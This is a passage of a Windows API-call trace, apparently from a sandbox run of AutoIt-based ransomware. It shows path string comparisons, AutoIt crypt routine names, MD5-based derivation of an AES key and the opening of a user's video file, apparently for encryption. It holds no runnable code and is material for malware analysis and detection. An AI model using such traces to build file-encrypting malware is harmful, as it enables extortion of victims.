lpString2="flyingship", cchCount2=10) returned 3 [0192.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WXcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XcEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cEV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EV8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZF\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GwLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wLjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LjRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jRbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Rbpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bpo46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="po46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="46x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9NeDS.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.663] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.663] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0192.663] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0192.663] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0192.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.663] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0192.663] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0192.664] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0192.664] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0192.664] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0192.664] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.664] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2d108d0, ftCreationTime.dwHighDateTime=0x1d5e51b, ftLastAccessTime.dwLowDateTime=0x4261b480, ftLastAccessTime.dwHighDateTime=0x1d5da61, ftLastWriteTime.dwLowDateTime=0x4261b480, ftLastWriteTime.dwHighDateTime=0x1d5da61, nFileSizeHigh=0x0, nFileSizeLow=0x8fd6, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="GwLjRbpo46x9NeDS.mkv", cAlternateFileName="GWLJRB~1.MKV")) returned 0x90ae18 [0192.664] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0192.664] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.664] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0192.664] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.664] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.664] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0192.664] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.664] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0192.665] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.665] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.665] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0192.665] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.665] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.665] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.665] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.665] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.665] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0192.665] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.665] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0192.666] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.666] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.666] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0192.667] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.667] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.667] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.667] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.667] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.667] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0192.667] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.667] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.667] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.667] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.667] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.667] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.667] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0192.667] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.667] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.667] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0192.667] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.667] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.668] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0192.668] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.668] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.668] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0192.668] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.668] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.668] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.668] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.668] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.668] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.668] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.669] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0192.669] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.669] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.669] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0192.669] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.669] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.669] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.669] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.669] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0192.669] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.669] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.669] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.669] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.669] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.669] CryptHashData (hHash=0x90af58, pbData=0x8df000, dwDataLen=0x19, dwFlags=0x1) returned 1 [0192.670] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.670] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.670] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.670] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.670] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.670] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0192.670] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.670] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.670] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0192.670] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.671] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.671] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.671] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.671] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.671] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.671] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0192.671] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.671] CryptDestroyHash (hHash=0x90af58) returned 1 [0192.671] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.671] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.671] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.671] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.671] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.671] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ccosswxcev8zf\\gwljrbpo46x9neds.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0192.672] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.673] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0192.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0192.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0192.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0192.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0192.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0192.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0192.673] HeapFree (in: 